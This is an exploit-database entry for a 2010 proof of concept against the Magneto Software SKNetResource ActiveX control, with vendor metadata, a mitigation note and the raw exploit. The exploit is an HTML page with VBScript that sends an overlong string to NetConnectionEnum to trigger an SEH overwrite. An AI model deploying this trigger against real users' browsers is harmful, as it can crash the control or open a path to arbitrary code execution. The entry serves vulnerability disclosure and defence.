Magneto Software Net Resource ActiveX NetConnectionEnum SEH Overwrite POC

vendor:

SKNetResource

by:

s4squatch

9,3

CVSS

HIGH

SEH Overwrite

119

CWE

Product Name: SKNetResource

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Magneto Software Net Resource ActiveX NetConnectionEnum SEH Overwrite POC

This exploit is related to Magneto Software Net Resource ActiveX Control. It is a SEH overwrite vulnerability which can be exploited by passing a long string of 12334 'A' characters as an argument to the NetConnectionEnum function. This can lead to arbitrary code execution.

Mitigation:

The vendor has not responded to the notifications sent by the author. Therefore, the only mitigation is to disable the ActiveX control or remove it from the system.

Source

Exploit-DB raw data:

<html>
<object classid='clsid:61251370-92BF-4A0E-8236-5904AC6FC9F2' id='target' /></object>
<script language='vbscript'>
'Magneto Software Net Resource ActiveX NetConnectionEnum SEH Overwrite POC
'Discovered by:  s4squatch
'Site:  www.securestate.com
'Date Discovered: 02/11/10
'www:  http://www.magnetosoft.com/products/sknetresource/sknetresource_features.htm
'Download:  http://www.magnetosoft.com/downloads/SystemInfoPackSetup.exe
'Vendor Notified: 02/02/10 --> NO RESPONSE
'Vendor Notified: 02/11/10 --> NO RESPONSE
'Vendor Notified: 02/17/10 --> NO RESPONSE
'SKNetResource.ocx
'Function NetConnectionEnum ( ByVal strServerName As String ,  ByVal strQualifier As String ,  ByRef pvarNetConnectionInfo As Variant ) As Long
'progid = "SKNETRESOURCELib.SKNetResource"

'SEH overwrite
buff = String(12334, "A")

arg1 = buff
arg2 = "defaultV"
arg3 = "defaultV"
target.NetConnectionEnum arg1 ,arg2 ,arg3 

</script>